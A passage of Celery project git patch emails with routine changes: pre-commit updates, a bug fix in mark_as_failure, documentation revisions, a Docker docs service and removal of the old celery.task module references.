Date: Thu, 29 Jul 2021 12:53:52 +0300
Subject: [PATCH 024/177] [pre-commit.ci] pre-commit autoupdate (#6876)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.21.2 → v2.23.0](https://github.com/asottile/pyupgrade/compare/v2.21.2...v2.23.0)
- https://gitlab.com/pycqa/flake8 → https://github.com/PyCQA/flake8
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 057c78f4787..940f18f6837 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,11 +1,11 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.21.2
+ rev: v2.23.0
hooks:
- id: pyupgrade
args: ["--py36-plus"]
- - repo: https://gitlab.com/pycqa/flake8
+ - repo: https://github.com/PyCQA/flake8
rev: 3.9.2
hooks:
- id: flake8
From 98fdcd749b0c4d3ec1ad0cfae058d193595413e1 Mon Sep 17 00:00:00 2001
From: John Zeringue
Date: Fri, 30 Jul 2021 11:31:36 -0400
Subject: [PATCH 025/177] Fix typo in mark_as_failure
---
celery/backends/base.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 71ca218d56e..4ad6de4697b 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -190,7 +190,7 @@ def mark_as_failure(self, task_id, exc,
# elements of the chain. This is only truly important so
# that the last chain element which controls completion of
# the chain itself is marked as completed to avoid stalls.
- if self.store_result and state in states.PROPAGATE_STATES:
+ if store_result and state in states.PROPAGATE_STATES:
try:
chained_task_id = chain_elem_opts['task_id']
except KeyError:
From 90d027eceab84a35966a39c7ca9918db66e6e0ed Mon Sep 17 00:00:00 2001
From: Marlon
Date: Tue, 3 Aug 2021 02:54:40 +0000
Subject: [PATCH 026/177] Update docs to reflect default scheduling strategy
-Ofair is now the default scheduling strategy as of v4.0: https://github.com/celery/celery/blob/8ebcce1523d79039f23da748f00bec465951de2a/docs/history/whatsnew-4.0.rst#ofair-is-now-the-default-scheduling-strategy
---
docs/userguide/tasks.rst | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index d35ac7d2891..b32ba11c8d6 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -64,11 +64,12 @@ consider enabling the :setting:`task_reject_on_worker_lost` setting.
the process by force so only use them to detect cases where you haven't
used manual timeouts yet.
- The default prefork pool scheduler is not friendly to long-running tasks,
- so if you have tasks that run for minutes/hours make sure you enable
- the :option:`-Ofair ` command-line argument to
- the :program:`celery worker`. See :ref:`optimizing-prefetch-limit` for more
- information, and for the best performance route long-running and
+ In previous versions, the default prefork pool scheduler was not friendly
+ to long-running tasks, so if you had tasks that ran for minutes/hours, it
+ was advised to enable the :option:`-Ofair ` command-line
+ argument to the :program:`celery worker`. However, as of version 4.0,
+ -Ofair is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit`
+ for more information, and for the best performance route long-running and
short-running tasks to dedicated workers (:ref:`routing-automatic`).
If your worker hangs then please investigate what tasks are running
From a8a8cd448988cc45023eec556d1060acd8e47721 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 2 Aug 2021 16:29:04 +0000
Subject: [PATCH 027/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.23.0 → v2.23.1](https://github.com/asottile/pyupgrade/compare/v2.23.0...v2.23.1)
- [github.com/pycqa/isort: 5.9.2 → 5.9.3](https://github.com/pycqa/isort/compare/5.9.2...5.9.3)
---
.pre-commit-config.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 940f18f6837..705d6f859ae 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.23.0
+ rev: v2.23.1
hooks:
- id: pyupgrade
args: ["--py36-plus"]
@@ -24,6 +24,6 @@ repos:
- id: mixed-line-ending
- repo: https://github.com/pycqa/isort
- rev: 5.9.2
+ rev: 5.9.3
hooks:
- id: isort
From 1c477c4098659648395b46987639e1ac3dba7e92 Mon Sep 17 00:00:00 2001
From: Thomas Grainger
Date: Tue, 3 Aug 2021 16:02:04 +0100
Subject: [PATCH 028/177] test on win32 py3.9 with pycurl windows wheels from
https://www.lfd.uci.edu/~gohlke/pythonlibs/ (#6875)
* use windows wheels from https://www.lfd.uci.edu/~gohlke/pythonlibs/
you're not supposed to use the wheels directly so I made my own mirror
on github pages
If you merge this I'll need you to move the repo into the celery org
* use find-links
* pycurl direct reference
* fix platform_system typo
* unexeclude win32 pypy and 3.10
* Update tox.ini
* Revert "unexeclude win32 pypy and 3.10"
This reverts commit 6bb7e8a980f3839f310607c767c8a97f563ca345.
* try simple repo
* use the celery.github.io wheelhouse
---
.github/workflows/python-package.yml | 2 --
tox.ini | 1 +
2 files changed, 1 insertion(+), 2 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 185072632dc..8ab6c68e6c5 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -33,8 +33,6 @@ jobs:
python-version: 'pypy-3.6'
- os: windows-2019
python-version: "3.10.0-beta.4"
- - os: windows-2019
- python-version: "3.9"
continue-on-error: ${{ startsWith(matrix.python-version, '3.10.0-beta.') }}
steps:
diff --git a/tox.ini b/tox.ini
index e3fb16cfc84..bf181af2731 100644
--- a/tox.ini
+++ b/tox.ini
@@ -45,6 +45,7 @@ commands =
unit: pytest --maxfail=10 -v --cov=celery --cov-report=xml --cov-report term {posargs}
integration: pytest -xsv t/integration {posargs}
setenv =
+ PIP_EXTRA_INDEX_URL=https://celery.github.io/celery-wheelhouse/repo/simple/
BOTO_CONFIG = /dev/null
WORKER_LOGLEVEL = INFO
PYTHONIOENCODING = UTF-8
From 186fa4791ee988263eafbc5648d032c6b4ae1c84 Mon Sep 17 00:00:00 2001
From: Tom Harvey
Date: Wed, 4 Aug 2021 13:09:15 +0200
Subject: [PATCH 029/177] Note on gevent time limit support (#6892)
I only learned this from https://github.com/celery/celery/issues/1958 which requests a doc update to make this clearer.
---
docs/userguide/workers.rst | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index d87b14f6e18..fa3cf468884 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -434,7 +434,7 @@ Time Limits
.. versionadded:: 2.0
-:pool support: *prefork/gevent*
+:pool support: *prefork/gevent (see note below)*
.. sidebar:: Soft, or hard?
@@ -474,6 +474,11 @@ Time limits can also be set using the :setting:`task_time_limit` /
Time limits don't currently work on platforms that don't support
the :sig:`SIGUSR1` signal.
+.. note::
+
+ The gevent pool does not implement soft time limits. Additionally,
+ it will not enforce the hard time limit if the task is blocking.
+
Changing time limits at run-time
--------------------------------
From ebeb4a4607d83cb5668fad5aaac5d5d8f2fb05b4 Mon Sep 17 00:00:00 2001
From: Dimitar Ganev
Date: Thu, 5 Aug 2021 17:18:32 +0300
Subject: [PATCH 030/177] Add docs service in docker-compose (#6894)
* Add docs service in docker-compose
* Add documentation about running the docs with docker
---
CONTRIBUTING.rst | 14 ++++++++++++
docker/docker-compose.yml | 11 ++++++++++
docker/docs/Dockerfile | 29 +++++++++++++++++++++++++
docker/docs/start | 7 ++++++
docs/Makefile | 7 ++++++
docs/make.bat | 6 +++++
requirements/docs.txt | 1 +
requirements/extras/sphinxautobuild.txt | 1 +
8 files changed, 76 insertions(+)
create mode 100644 docker/docs/Dockerfile
create mode 100644 docker/docs/start
create mode 100644 requirements/extras/sphinxautobuild.txt
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index 5e51b3083f5..c96ee55fb1e 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -710,6 +710,20 @@ After building succeeds, the documentation is available at :file:`_build/html`.
.. _contributing-verify:
+Build the documentation using Docker
+------------------------------------
+
+Build the documentation by running:
+
+.. code-block:: console
+
+ $ docker-compose -f docker/docker-compose.yml up --build docs
+
+The service will start a local docs server at ``:7000``. The server is using
+``sphinx-autobuild`` with the ``--watch`` option enabled, so you can live
+edit the documentation. Check the additional options and configs in
+:file:`docker/docker-compose.yml`
+
Verifying your contribution
---------------------------
diff --git a/docker/docker-compose.yml b/docker/docker-compose.yml
index d0c4c34179e..037947f35e0 100644
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -37,3 +37,14 @@ services:
azurite:
image: mcr.microsoft.com/azure-storage/azurite:3.10.0
+
+ docs:
+ image: celery/docs
+ build:
+ context: ..
+ dockerfile: docker/docs/Dockerfile
+ volumes:
+ - ../docs:/docs:z
+ ports:
+ - "7000:7000"
+ command: /start-docs
\ No newline at end of file
diff --git a/docker/docs/Dockerfile b/docker/docs/Dockerfile
new file mode 100644
index 00000000000..616919f2b54
--- /dev/null
+++ b/docker/docs/Dockerfile
@@ -0,0 +1,29 @@
+FROM python:3.9-slim-buster
+
+ENV PYTHONUNBUFFERED 1
+ENV PYTHONDONTWRITEBYTECODE 1
+
+RUN apt-get update \
+ # dependencies for building Python packages
+ && apt-get install -y build-essential \
+ && apt-get install -y texlive \
+ && apt-get install -y texlive-latex-extra \
+ && apt-get install -y dvipng \
+ && apt-get install -y python3-sphinx \
+ # Translations dependencies
+ && apt-get install -y gettext \
+ # cleaning up unused files
+ && apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false \
+ && rm -rf /var/lib/apt/lists/*
+
+# # Requirements are installed here to ensure they will be cached.
+COPY /requirements /requirements
+
+# All imports needed for autodoc.
+RUN pip install -r /requirements/docs.txt -r /requirements/default.txt
+
+COPY docker/docs/start /start-docs
+RUN sed -i 's/\r$//g' /start-docs
+RUN chmod +x /start-docs
+
+WORKDIR /docs
\ No newline at end of file
diff --git a/docker/docs/start b/docker/docs/start
new file mode 100644
index 00000000000..9c0b4d4de1d
--- /dev/null
+++ b/docker/docs/start
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+set -o errexit
+set -o pipefail
+set -o nounset
+
+make livehtml
\ No newline at end of file
diff --git a/docs/Makefile b/docs/Makefile
index 3ec9ca41f78..cfed0cb0fdf 100644
--- a/docs/Makefile
+++ b/docs/Makefile
@@ -6,6 +6,8 @@ SPHINXOPTS =
SPHINXBUILD = sphinx-build
PAPER =
BUILDDIR = _build
+SOURCEDIR = .
+APP = /docs
# Internal variables.
PAPEROPT_a4 = -D latex_paper_size=a4
@@ -18,6 +20,7 @@ I18NSPHINXOPTS = $(PAPEROPT_$(PAPER)) $(SPHINXOPTS) .
help:
@echo "Please use \`make ' where is one of"
@echo " html to make standalone HTML files"
+ @echo " livehtml to start a local server hosting the docs"
@echo " dirhtml to make HTML files named index.html in directories"
@echo " singlehtml to make a single large HTML file"
@echo " pickle to make pickle files"
@@ -231,3 +234,7 @@ pseudoxml:
$(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml
@echo
@echo "Build finished. The pseudo-XML files are in $(BUILDDIR)/pseudoxml."
+
+.PHONY: livehtml
+livehtml:
+ sphinx-autobuild -b html --host 0.0.0.0 --port 7000 --watch $(APP) -c . $(SOURCEDIR) $(BUILDDIR)/html
\ No newline at end of file
diff --git a/docs/make.bat b/docs/make.bat
index a75aa4e2866..045f00bf8c5 100644
--- a/docs/make.bat
+++ b/docs/make.bat
@@ -19,6 +19,7 @@ if "%1" == "help" (
:help
echo.Please use `make ^` where ^ is one of
echo. html to make standalone HTML files
+ echo. livehtml to start a local server hosting the docs
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
@@ -269,4 +270,9 @@ if "%1" == "pseudoxml" (
goto end
)
+if "%1" == "livehtml" (
+ sphinx-autobuild -b html --open-browser -p 7000 --watch %APP% -c . %SOURCEDIR% %BUILDDIR%/html
+ goto end
+)
+
:end
diff --git a/requirements/docs.txt b/requirements/docs.txt
index 69d31dffcce..46b82bd3c26 100644
--- a/requirements/docs.txt
+++ b/requirements/docs.txt
@@ -6,3 +6,4 @@ sphinx-click==2.5.0
-r test.txt
-r deps/mock.txt
-r extras/auth.txt
+-r extras/sphinxautobuild.txt
diff --git a/requirements/extras/sphinxautobuild.txt b/requirements/extras/sphinxautobuild.txt
new file mode 100644
index 00000000000..01ce5dfaf45
--- /dev/null
+++ b/requirements/extras/sphinxautobuild.txt
@@ -0,0 +1 @@
+sphinx-autobuild>=2021.3.14
\ No newline at end of file
From 846066a34413509695434ed5a661280d7db4f993 Mon Sep 17 00:00:00 2001
From: Caitlin <10053862+con-cat@users.noreply.github.com>
Date: Fri, 6 Aug 2021 13:35:38 +1000
Subject: [PATCH 031/177] Update docs on Redis Message Priorities
The naming of priority queues in Redis doesn't currently work as it's
described in the docs - the queues have a separator as well as a
priority number appended to them, and the highest priority queue has no
suffix. This change updates the docs to reflect this, and adds
information on how to configure the separator.
Relevant link: https://github.com/celery/kombu/issues/422
---
docs/userguide/routing.rst | 18 +++++++++++++++---
1 file changed, 15 insertions(+), 3 deletions(-)
diff --git a/docs/userguide/routing.rst b/docs/userguide/routing.rst
index 300c655a12d..ab1a0d6c2c4 100644
--- a/docs/userguide/routing.rst
+++ b/docs/userguide/routing.rst
@@ -274,22 +274,34 @@ To start scheduling tasks based on priorities you need to configure queue_order_
The priority support is implemented by creating n lists for each queue.
This means that even though there are 10 (0-9) priority levels, these are
consolidated into 4 levels by default to save resources. This means that a
-queue named celery will really be split into 4 queues:
+queue named celery will really be split into 4 queues.
+
+The highest priority queue will be named celery, and the the other queues will
+have a separator (by default `\x06\x16`) and their priority number appended to
+the queue name.
.. code-block:: python
- ['celery0', 'celery3', 'celery6', 'celery9']
+ ['celery', 'celery\x06\x163', 'celery\x06\x166', 'celery\x06\x169']
-If you want more priority levels you can set the priority_steps transport option:
+If you want more priority levels or a different separator you can set the
+priority_steps and sep transport options:
.. code-block:: python
app.conf.broker_transport_options = {
'priority_steps': list(range(10)),
+ 'sep': ':',
'queue_order_strategy': 'priority',
}
+The config above will give you these queue names:
+
+.. code-block:: python
+
+ ['celery', 'celery:1', 'celery:2', 'celery:3', 'celery:4', 'celery:5', 'celery:6', 'celery:7', 'celery:8', 'celery:9']
+
That said, note that this will never be as good as priorities implemented at the
server level, and may be approximate at best. But it may still be good enough
From 3cf5072ee5f95744024f60e0f4a77eb2edb8959f Mon Sep 17 00:00:00 2001
From: Frank Dana
Date: Sat, 7 Aug 2021 01:55:04 -0400
Subject: [PATCH 032/177] Remove celery.task references in modules, docs
(#6869)
* Complete celery.task removal
* Update docs to remove celery.tasks
* docs/userguide/application: Correct reference
* Fix bad @Signature references
---
celery/__init__.py | 3 +--
celery/app/control.py | 2 +-
celery/app/registry.py | 2 +-
celery/app/task.py | 4 ++--
celery/backends/base.py | 6 +-----
celery/local.py | 22 ----------------------
celery/worker/control.py | 2 +-
docs/conf.py | 2 --
docs/internals/app-overview.rst | 19 -------------------
docs/userguide/application.rst | 27 ++++++++++-----------------
docs/userguide/configuration.rst | 4 ++--
docs/userguide/periodic-tasks.rst | 12 ++++++------
docs/userguide/routing.rst | 2 +-
docs/userguide/tasks.rst | 6 +++---
docs/whatsnew-5.1.rst | 3 ++-
15 files changed, 31 insertions(+), 85 deletions(-)
diff --git a/celery/__init__.py b/celery/__init__.py
index 1169a2d55f1..cc6b3dca870 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -27,7 +27,7 @@
# -eof meta-
__all__ = (
- 'Celery', 'bugreport', 'shared_task', 'task', 'Task',
+ 'Celery', 'bugreport', 'shared_task', 'Task',
'current_app', 'current_task', 'maybe_signature',
'chain', 'chord', 'chunks', 'group', 'signature',
'xmap', 'xstarmap', 'uuid',
@@ -161,7 +161,6 @@ def maybe_patch_concurrency(argv=None, short_opts=None,
],
'celery.utils': ['uuid'],
},
- direct={'task': 'celery.task'},
__package__='celery', __file__=__file__,
__path__=__path__, __doc__=__doc__, __version__=__version__,
__author__=__author__, __contact__=__contact__,
diff --git a/celery/app/control.py b/celery/app/control.py
index 8bde53aebe1..551ae68bf8b 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -536,7 +536,7 @@ def rate_limit(self, task_name, rate_limit, destination=None, **kwargs):
task_name (str): Name of task to change rate limit for.
rate_limit (int, str): The rate limit as tasks per second,
or a rate limit string (`'100/m'`, etc.
- see :attr:`celery.task.base.Task.rate_limit` for
+ see :attr:`celery.app.task.Task.rate_limit` for
more information).
See Also:
diff --git a/celery/app/registry.py b/celery/app/registry.py
index 574457a6cba..707567d1571 100644
--- a/celery/app/registry.py
+++ b/celery/app/registry.py
@@ -36,7 +36,7 @@ def unregister(self, name):
Arguments:
name (str): name of the task to unregister, or a
- :class:`celery.task.base.Task` with a valid `name` attribute.
+ :class:`celery.app.task.Task` with a valid `name` attribute.
Raises:
celery.exceptions.NotRegistered: if the task is not registered.
diff --git a/celery/app/task.py b/celery/app/task.py
index 726bb103fe7..88f34889255 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -881,7 +881,7 @@ def replace(self, sig):
.. versionadded:: 4.0
Arguments:
- sig (~@Signature): signature to replace with.
+ sig (Signature): signature to replace with.
Raises:
~@Ignore: This is always raised when called in asynchronous context.
@@ -941,7 +941,7 @@ def add_to_chord(self, sig, lazy=False):
Currently only supported by the Redis result backend.
Arguments:
- sig (~@Signature): Signature to extend chord with.
+ sig (Signature): Signature to extend chord with.
lazy (bool): If enabled the new task won't actually be called,
and ``sig.delay()`` must be called manually.
"""
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 4ad6de4697b..6c046028c57 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -620,11 +620,7 @@ def delete_group(self, group_id):
return self._delete_group(group_id)
def cleanup(self):
- """Backend cleanup.
-
- Note:
- This is run by :class:`celery.task.DeleteExpiredTaskMetaTask`.
- """
+ """Backend cleanup."""
def process_cleanup(self):
"""Cleanup actions to do at the end of a task worker process."""
diff --git a/celery/local.py b/celery/local.py
index f3803f40bec..6eed19194dd 100644
--- a/celery/local.py
+++ b/celery/local.py
@@ -399,20 +399,11 @@ def getappattr(path):
return current_app._rgetattr(path)
-def _compat_periodic_task_decorator(*args, **kwargs):
- from celery.task import periodic_task
- return periodic_task(*args, **kwargs)
-
-
COMPAT_MODULES = {
'celery': {
'execute': {
'send_task': 'send_task',
},
- 'decorators': {
- 'task': 'task',
- 'periodic_task': _compat_periodic_task_decorator,
- },
'log': {
'get_default_logger': 'log.get_default_logger',
'setup_logger': 'log.setup_logger',
@@ -428,19 +419,6 @@ def _compat_periodic_task_decorator(*args, **kwargs):
'tasks': 'tasks',
},
},
- 'celery.task': {
- 'control': {
- 'broadcast': 'control.broadcast',
- 'rate_limit': 'control.rate_limit',
- 'time_limit': 'control.time_limit',
- 'ping': 'control.ping',
- 'revoke': 'control.revoke',
- 'discard_all': 'control.purge',
- 'inspect': 'control.inspect',
- },
- 'schedules': 'celery.schedules',
- 'chords': 'celery.canvas',
- }
}
#: We exclude these from dir(celery)
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 9dd00d22a97..2518948f1b1 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -187,7 +187,7 @@ def rate_limit(state, task_name, rate_limit, **kwargs):
"""Tell worker(s) to modify the rate limit for a task by type.
See Also:
- :attr:`celery.task.base.Task.rate_limit`.
+ :attr:`celery.app.task.Task.rate_limit`.
Arguments:
task_name (str): Type of task to set rate limit for.
diff --git a/docs/conf.py b/docs/conf.py
index d5c4c9276fa..f28a5c9c72b 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -27,10 +27,8 @@
},
apicheck_ignore_modules=[
'celery.__main__',
- 'celery.task',
'celery.contrib.testing',
'celery.contrib.testing.tasks',
- 'celery.task.base',
'celery.bin',
'celery.bin.celeryd_detach',
'celery.contrib',
diff --git a/docs/internals/app-overview.rst b/docs/internals/app-overview.rst
index 3634a5f8060..965a148cca2 100644
--- a/docs/internals/app-overview.rst
+++ b/docs/internals/app-overview.rst
@@ -100,18 +100,7 @@ Deprecated
Aliases (Pending deprecation)
=============================
-* ``celery.task.base``
- * ``.Task`` -> {``app.Task`` / :class:`celery.app.task.Task`}
-
-* ``celery.task.sets``
- * ``.TaskSet`` -> {``app.TaskSet``}
-
-* ``celery.decorators`` / ``celery.task``
- * ``.task`` -> {``app.task``}
-
* ``celery.execute``
- * ``.apply_async`` -> {``task.apply_async``}
- * ``.apply`` -> {``task.apply``}
* ``.send_task`` -> {``app.send_task``}
* ``.delay_task`` -> *no alternative*
@@ -146,14 +135,6 @@ Aliases (Pending deprecation)
* ``.get_queues`` -> {``app.amqp.get_queues``}
-* ``celery.task.control``
- * ``.broadcast`` -> {``app.control.broadcast``}
- * ``.rate_limit`` -> {``app.control.rate_limit``}
- * ``.ping`` -> {``app.control.ping``}
- * ``.revoke`` -> {``app.control.revoke``}
- * ``.discard_all`` -> {``app.control.discard_all``}
- * ``.inspect`` -> {``app.control.inspect``}
-
* ``celery.utils.info``
* ``.humanize_seconds`` -> ``celery.utils.time.humanize_seconds``
* ``.textindent`` -> ``celery.utils.textindent``
diff --git a/docs/userguide/application.rst b/docs/userguide/application.rst
index 4fb6c665e39..502353d1013 100644
--- a/docs/userguide/application.rst
+++ b/docs/userguide/application.rst
@@ -360,19 +360,15 @@ Finalizing the object will:
.. topic:: The "default app"
Celery didn't always have applications, it used to be that
- there was only a module-based API, and for backwards compatibility
- the old API is still there until the release of Celery 5.0.
+ there was only a module-based API. A compatibility API was
+ available at the old location until the release of Celery 5.0,
+ but has been removed.
Celery always creates a special app - the "default app",
and this is used if no custom application has been instantiated.
- The :mod:`celery.task` module is there to accommodate the old API,
- and shouldn't be used if you use a custom app. You should
- always use the methods on the app instance, not the module based API.
-
- For example, the old Task base class enables many compatibility
- features where some may be incompatible with newer features, such
- as task methods:
+ The :mod:`celery.task` module is no longer available. Use the
+ methods on the app instance, not the module based API:
.. code-block:: python
@@ -380,9 +376,6 @@ Finalizing the object will:
from celery import Task # << NEW base class.
- The new base class is recommended even if you use the old
- module-based API.
-
Breaking the chain
==================
@@ -456,7 +449,7 @@ chain breaks:
.. code-block:: python
- from celery.task import Task
+ from celery import Task
from celery.registry import tasks
class Hello(Task):
@@ -475,16 +468,16 @@ chain breaks:
.. code-block:: python
- from celery.task import task
+ from celery import app
- @task(queue='hipri')
+ @app.task(queue='hipri')
def hello(to):
return 'hello {0}'.format(to)
Abstract Tasks
==============
-All tasks created using the :meth:`~@task` decorator
+All tasks created using the :meth:`@task` decorator
will inherit from the application's base :attr:`~@Task` class.
You can specify a different base class using the ``base`` argument:
@@ -513,7 +506,7 @@ class: :class:`celery.Task`.
If you override the task's ``__call__`` method, then it's very important
that you also call ``self.run`` to execute the body of the task. Do not
- call ``super().__call__``. The ``__call__`` method of the neutral base
+ call ``super().__call__``. The ``__call__`` method of the neutral base
class :class:`celery.Task` is only present for reference. For optimization,
this has been unrolled into ``celery.app.trace.build_tracer.trace_task``
which calls ``run`` directly on the custom task class if no ``__call__``
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 14fa89df2ca..e225eb1fe76 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -484,7 +484,7 @@ you can set :setting:`task_store_errors_even_if_ignored`.
Default: Disabled.
If set, the worker stores all task errors in the result store even if
-:attr:`Task.ignore_result ` is on.
+:attr:`Task.ignore_result ` is on.
.. setting:: task_track_started
@@ -2132,7 +2132,7 @@ the final message options will be:
immediate=False, exchange='video', routing_key='video.compress'
(and any default message options defined in the
-:class:`~celery.task.base.Task` class)
+:class:`~celery.app.task.Task` class)
Values defined in :setting:`task_routes` have precedence over values defined in
:setting:`task_queues` when merging the two.
diff --git a/docs/userguide/periodic-tasks.rst b/docs/userguide/periodic-tasks.rst
index dcc360972ff..718f4c8af90 100644
--- a/docs/userguide/periodic-tasks.rst
+++ b/docs/userguide/periodic-tasks.rst
@@ -106,19 +106,19 @@ beat schedule list.
@app.task
def test(arg):
print(arg)
-
+
@app.task
def add(x, y):
z = x + y
- print(z)
+ print(z)
Setting these up from within the :data:`~@on_after_configure` handler means
-that we'll not evaluate the app at module level when using ``test.s()``. Note that
+that we'll not evaluate the app at module level when using ``test.s()``. Note that
:data:`~@on_after_configure` is sent after the app is set up, so tasks outside the
-module where the app is declared (e.g. in a `tasks.py` file located by
-:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
+module where the app is declared (e.g. in a `tasks.py` file located by
+:meth:`celery.Celery.autodiscover_tasks`) must use a later signal, such as
:data:`~@on_after_finalize`.
The :meth:`~@add_periodic_task` function will add the entry to the
@@ -192,7 +192,7 @@ Available Fields
Execution options (:class:`dict`).
This can be any argument supported by
- :meth:`~celery.task.base.Task.apply_async` --
+ :meth:`~celery.app.task.Task.apply_async` --
`exchange`, `routing_key`, `expires`, and so on.
* `relative`
diff --git a/docs/userguide/routing.rst b/docs/userguide/routing.rst
index ab1a0d6c2c4..1dbac6807cf 100644
--- a/docs/userguide/routing.rst
+++ b/docs/userguide/routing.rst
@@ -636,7 +636,7 @@ Specifying task destination
The destination for a task is decided by the following (in order):
1. The routing arguments to :func:`Task.apply_async`.
-2. Routing related attributes defined on the :class:`~celery.task.base.Task`
+2. Routing related attributes defined on the :class:`~celery.app.task.Task`
itself.
3. The :ref:`routers` defined in :setting:`task_routes`.
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index b32ba11c8d6..afa25939461 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -92,7 +92,7 @@ Basics
======
You can easily create a task from any callable by using
-the :meth:`~@task` decorator:
+the :meth:`@task` decorator:
.. code-block:: python
@@ -743,7 +743,7 @@ Sometimes you just want to retry a task whenever a particular exception
is raised.
Fortunately, you can tell Celery to automatically retry a task using
-`autoretry_for` argument in the :meth:`~@Celery.task` decorator:
+`autoretry_for` argument in the :meth:`@task` decorator:
.. code-block:: python
@@ -754,7 +754,7 @@ Fortunately, you can tell Celery to automatically retry a task using
return twitter.refresh_timeline(user)
If you want to specify custom arguments for an internal :meth:`~@Task.retry`
-call, pass `retry_kwargs` argument to :meth:`~@Celery.task` decorator:
+call, pass `retry_kwargs` argument to :meth:`@task` decorator:
.. code-block:: python
diff --git a/docs/whatsnew-5.1.rst b/docs/whatsnew-5.1.rst
index a59bb0d154f..bdd35f0773c 100644
--- a/docs/whatsnew-5.1.rst
+++ b/docs/whatsnew-5.1.rst
@@ -357,7 +357,7 @@ Documentation: :setting:`worker_cancel_long_running_tasks_on_connection_loss`
-----------------------------------------------------------------------
`task.apply_async` now supports passing `ignore_result` which will act the same
-as using `@app.task(ignore_result=True)`.
+as using ``@app.task(ignore_result=True)``.
Use a thread-safe implementation of `cached_property`
-----------------------------------------------------
@@ -372,6 +372,7 @@ Tasks can now have required kwargs at any order
Tasks can now be defined like this:
.. code-block:: python
+
from celery import shared_task
@shared_task
From d3e5df32a53d71c8a3c850ca6bc35651c44b5854 Mon Sep 17 00:00:00 2001
From: Jinoh Kang
Date: Sun, 8 Aug 2021 22:33:44 +0900
Subject: [PATCH 033/177] docs: remove obsolete section "Automatic naming and
relative imports" (#6904)
Celery 5.0 dropped support for Python 2 and only supports Python 3.
Since Python 3 does not support old-style relative imports, the entire
section can be dropped.
Also remove a reference to the section above in
docs/django/first-steps-with-django.rst.
This change shall *not* be backported to Celery <5.0.
Fixes #6903.
Signed-off-by: Jinoh Kang
---
docs/django/first-steps-with-django.rst | 9 ---
docs/userguide/tasks.rst | 86 -------------------------
2 files changed, 95 deletions(-)
diff --git a/docs/django/first-steps-with-django.rst b/docs/django/first-steps-with-django.rst
index 7a0727885e1..2b402c8a505 100644
--- a/docs/django/first-steps-with-django.rst
+++ b/docs/django/first-steps-with-django.rst
@@ -153,15 +153,6 @@ concrete app instance:
You can find the full source code for the Django example project at:
https://github.com/celery/celery/tree/master/examples/django/
-.. admonition:: Relative Imports
-
- You have to be consistent in how you import the task module.
- For example, if you have ``project.app`` in ``INSTALLED_APPS``, then you
- must also import the tasks ``from project.app`` or else the names
- of the tasks will end up being different.
-
- See :ref:`task-naming-relative-imports`
-
Extensions
==========
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index afa25939461..60e2acf7f9d 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -237,92 +237,6 @@ named :file:`tasks.py`:
>>> add.name
'tasks.add'
-.. _task-naming-relative-imports:
-
-Automatic naming and relative imports
--------------------------------------
-
-.. sidebar:: Absolute Imports
-
- The best practice for developers targeting Python 2 is to add the
- following to the top of **every module**:
-
- .. code-block:: python
-
- from __future__ import absolute_import
-
- This will force you to always use absolute imports so you will
- never have any problems with tasks using relative names.
-
- Absolute imports are the default in Python 3 so you don't need this
- if you target that version.
-
-Relative imports and automatic name generation don't go well together,
-so if you're using relative imports you should set the name explicitly.
-
